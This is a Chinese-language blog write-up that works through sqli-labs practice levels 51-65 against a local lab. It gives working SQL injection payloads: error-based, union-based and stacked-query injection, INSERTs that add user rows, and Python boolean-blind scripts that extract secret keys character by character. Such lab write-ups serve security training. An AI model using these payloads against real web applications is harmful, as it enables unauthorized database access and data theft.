sqli-lab 51-65

最新推荐文章于 2024-08-02 10:56:12 发布
最新推荐文章于 2024-08-02 10:56:12 发布
阅读量139 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/124436268
版权

Less-51:

首先打开题目测试发现是’闭合,并且能报错和Less-47一样直接报错注入

1' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)-- dsa

获取username的值:

在这里插入图片描述

Less-52:

发现能打堆叠注入:

插入数据:

?sort=1;insert into users(id,username,password) values('17','hack','123456')-- da

在这里插入图片描述

发现我们插入的hack数据成功

Less-53:

发现和52一样但是没有报错信息,就打堆叠注入,是’闭合:

插入数据hack1

?sort=1';insert into users(id,username,password) values('18','hack1','123456')-- da

在这里插入图片描述

Less-54:

打开题目得到:

在这里插入图片描述
题目意思:

此挑战的目标是在不到10次的尝试中,仅从数据库的随机表(“挑战”)中转储(密钥)

为了好玩,每次重置,挑战都会产生随机的表名、列名和表数据。随时保持新鲜。

所以我们尝试注入发现是’闭合的union注入:

获取到数据库

?id=-1' union select 1,database(),3-- ad

在这里插入图片描述
进一步获取表:

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad

在这里插入图片描述

获取表的列:

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='y3c6wljhoj'),3-- ad

在这里插入图片描述

获取secret_HWX6的值提交:

?id=-1' union select 1,(select group_concat(secret_HWX6) from y3c6wljhoj),3-- ad

在这里插入图片描述

提交key:

在这里插入图片描述
在这里插入图片描述

Less-55:

发现和Less-54一样但是是)闭合:

获取数据库:

?id=-1) union select 1,database(),3-- ad

在这里插入图片描述

获取表名:

?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad

在这里插入图片描述

获取列名:

?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='k5fh2qgiut'),3-- ad

在这里插入图片描述

获取secret的值:

?id=-1) union select 1,(select group_concat(secret_2ICN) from k5fh2qgiut),3-- ad

在这里插入图片描述
提交key:

在这里插入图片描述

Less-56:

和上一题一样但是’)闭合

获取数据库:

?id=-1') union select 1,database(),3-- ad

在这里插入图片描述

获取表名:

?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3-- ad

在这里插入图片描述

获取列名:

?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='k092nxgyt2'),3-- ad

在这里插入图片描述

获取secret的值:

?id=-1') union select 1,(select group_concat(secret_ZEE5) from k092nxgyt2),3-- ad

在这里插入图片描述
提交key:

在这里插入图片描述

Less-57:

发现与上一题一样,但是是"闭合

获取表,列方法一样

获取secret的值:

?id=-1" union select 1,(select group_concat(secret_RNUQ) from a0mg9eh2ot),3-- ad

在这里插入图片描述
提交key:

在这里插入图片描述

Less-58:

发现 ’ 报错,和上面一样这里用报错注入

获取表,列用报错注入方法和上几题报错注入的一样

获取secret的值:

?id='and updatexml(1,concat(0x7e,(select group_concat(secret_JG7L) from 8ef31gojep),0x7e),1) -- asd

在这里插入图片描述
提交key:

在这里插入图片描述

Less-59:

发现和Less-58一样,但是整型闭合

获取secret的值:

?id=1 and updatexml(1,concat(0x7e,(select group_concat(secret_OUQ8) from sswc0q9fky),0x7e),1) -- asd

在这里插入图片描述
提交key:

在这里插入图片描述

Less-60:

发现和Less-59一样,但是 ") 闭合

获取secret的值:

?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_GNZC) from 2xfjxrn4jr),0x7e),1) -- asd

在这里插入图片描述
提交key:

在这里插入图片描述

Less-61:

发现和Less-60一样,但是 ')) 闭合

获取secret的值:

?id=1')) and updatexml(1,concat(0x7e,(select group_concat(secret_QC5B) from vcyf8g5w12),0x7e),1) -- asd

在这里插入图片描述

提交key:

在这里插入图片描述

Less-62:

发现布尔判断,没有报错,但是 ') 闭合,不能用报错注入

union注入也不行
因为源码对输出的用户、密码进行了限制

在这里插入图片描述

所以利用布尔盲注

首先判断数据库长度:

在这里插入图片描述
在这里插入图片描述

发现当数据库长度大于10时没有回显,大于9是有回显Angelina

判断数据库长度为10,判断标准是Angelina

编写python脚本:

import requests
url = 'http://127.0.0.1/sqli/Less-62/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')

while True:
    m += 1 #长度
    over = str #判断结束标志
    for code in range(1,256):

        #获取数据库:f"1') and (ord(substr(database(),{m},1))={code})-- da"
        #获取表:f"1') and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        #获取列:f"1') and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vcyf8g5w12'),{m},1))={code})-- da"
        #获取值: f"1') and (ord(substr((select group_concat(secret_QC5B) from vcyf8g5w12),{m},1))={code})-- da"
        payload = f"1') and (ord(substr((select group_concat(secret_QC5B) from vcyf8g5w12),{m},1))={code})-- da"
        html = requests.get(url+payload)
        sign = html.text

        if 'Angelina' in sign:
            str += chr(code)
            print(f'{chr(code)}',end='')

    if over == str:
        break

print()
print(f'[*]爆破结果:{str}')

获取secret的值:

在这里插入图片描述

提交key:

在这里插入图片描述

Less-63

发现和less62一样,但是 ’ 闭合

python脚本:

import requests
url = 'http://127.0.0.1/sqli/Less-63/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')

while True:
    m += 1 #长度
    over = str #判断结束标志
    for code in range(1,256):

        #获取数据库:f"1' and (ord(substr(database(),{m},1))={code})-- da"
        #获取表:f"1' and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        #获取列:f"1' and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='nfzptrb2e3'),{m},1))={code})-- da"
        #获取值: f"1' and (ord(substr((select group_concat(secret_CKD1) from nfzptrb2e3),{m},1))={code})-- da"
        payload = f"1' and (ord(substr((select group_concat(secret_CKD1) from nfzptrb2e3),{m},1))={code})-- da"
        html = requests.get(url+payload)
        sign = html.text

        if 'Angelina' in sign:
            str += chr(code)
            print(f'{chr(code)}',end='')

    if over == str:
        break

print()
print(f'[*]爆破结果:{str}')

获取secret的值:

在这里插入图片描述

提交key:

在这里插入图片描述

Less-64

发现和less63一样,但是 )) 闭合

在这里插入图片描述

python脚本:

import requests
url = 'http://127.0.0.1/sqli/Less-64/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')

while True:
    m += 1 #长度
    over = str #判断结束标志
    for code in range(1,256):

        #获取数据库:f"1)) and (ord(substr(database(),{m},1))={code})-- da"
        #获取表:f"1)) and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        #获取列:f"1)) and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='qzqoywa5dj'),{m},1))={code})-- da"
        #获取值: f"1)) and (ord(substr((select group_concat(secret_C3YJ) from qzqoywa5dj),{m},1))={code})-- da"
        payload = f"1)) and (ord(substr((select group_concat(secret_C3YJ) from qzqoywa5dj),{m},1))={code})-- da"
        html = requests.get(url+payload)
        sign = html.text

        if 'Angelina' in sign:
            str += chr(code)
            print(f'{chr(code)}',end='')

    if over == str:
        break

print()
print(f'[*]爆破结果:{str}')

获取secret的值:

在这里插入图片描述

提交key:

在这里插入图片描述

Less-65

发现和less64一样,但是 1") 闭合

在这里插入图片描述

python脚本:

import requests
url = 'http://127.0.0.1/sqli/Less-65/?id='
str = ''
m = 0
print('[*]开始爆破......')
print('[*]:',end='')

while True:
    m += 1 #长度
    over = str #判断结束标志
    for code in range(1,256):

        #获取数据库:f"1\") and (ord(substr(database(),{m},1))={code})-- da"
        #获取表:f"1\") and (ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{m},1))={code})-- da"
        #获取列:f"1\") and (ord(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='7qaeec6nuf'),{m},1))={code})-- da"
        #获取值: f"1\") and (ord(substr((select group_concat(secret_WKXE) from 7qaeec6nuf),{m},1))={code})-- da"
        payload = f"1\") and (ord(substr((select group_concat(secret_WKXE) from 7qaeec6nuf),{m},1))={code})-- da"
        html = requests.get(url+payload)
        sign = html.text

        if 'Angelina' in sign:
            str += chr(code)
            print(f'{chr(code)}',end='')

    if over == str:
        break

print()
print(f'[*]爆破结果:{str}')

获取secret的值:

在这里插入图片描述

提交key:

在这里插入图片描述

剩下的题目发现是:

在这里插入图片描述
看源码

在这里插入图片描述

发现到Less-65就结束了

南冥~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sqli-labs Less - 62、63、64、65sqli-labs闯关指南 62、63、64、65
m0_54899775的博客
12-30 1843
sqli-labs Less - 62、63、64、65sqli-labs闯关指南 62、63、64、65
sqli-labs做题记录(全65)
ma963852的博客
03-18 5017
1,字符型 http://192.168.2.6/sqli-labs/Less-1/?id=-1' union select 1,2,3; --+ 2,数值型 http://192.168.2.6/sqli-labs/Less-2/?id=-1 union select 1,2,3; --+ 3,id值加了括号,需要闭合掉 http://192.168.2.6/sqli-labs/Less-3/?id=-1')union select 1,2,3 ; --+ 4,由双引号闭合,且有括号 htt
sqli-labs/Less-63
m0_71299382的博客
11-25 148
sqli-labs第六十三关
sqli-labs (less-63)
kukudeshuo的博客
03-17 165
sqli-labs (less-63) 进入63关 http://127.0.0.1/sql1/Less-63/?id=1 http://127.0.0.1/sql1/Less-63/?id=1' 没有任何错误显示,唉,又是万恶的Boolean盲注 http://127.0.0.1/sql1/Less-63/?id=1’–+ 所以判断闭合方式为1’–+,并且为字符型注入 接下来的步骤我就不加赘述了,具体过程请看我的less-5 ...
sqli-labs/Less-51
m0_71299382的博客
11-24 351
sqli-labs第五十一关
sqli-labs训练平台靶场详解!!!!
ytdd66的博客
03-19 4839
下面选取几个具有代表性的关卡,演示几种 SQL 注入漏洞利用方法。
sqli-labs环境搭建及复现
m0_74344277的博客
09-06 957
安装完后打开软件,开启nginx和mysql
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
从零开始学习网络安全渗透测试之基础入门篇——(六)网络抓包&全局协议&封包监听&网卡模式&科来&wireshark&PC应用
最新发布
love6a6的博客
08-02 571
是一种用于捕获和分析网络数据包的技术手段。它能够帮助我们深入了解网络中的数据传输情况,对于网络故障排查、性能优化、安全监测等方面都具有重要意义。网络抓包的工作原理通常是通过将网络接口设置为混杂模式,使其能够接收流经该接口的所有数据包。然后,使用专门的抓包软件或工具对这些数据包进行捕获和存储。为了方便大家使用,作者收集到百度网盘分享学习。链接:https://pan.baidu.com/s/1uKUsQfIlWOxTNPvU8DewKQ?pwd=mf7v提取码:mf7v。
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
互联网架构小马的博客
07-29 787
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。“渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面所以,学习Web安全的重要性不言而喻。Web安全吸引越来越多的人学习,有人是被其炫酷感染,有人是出于对技术的热爱,但大多数人还是为了高薪资和职场发展。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 1055
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 889
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值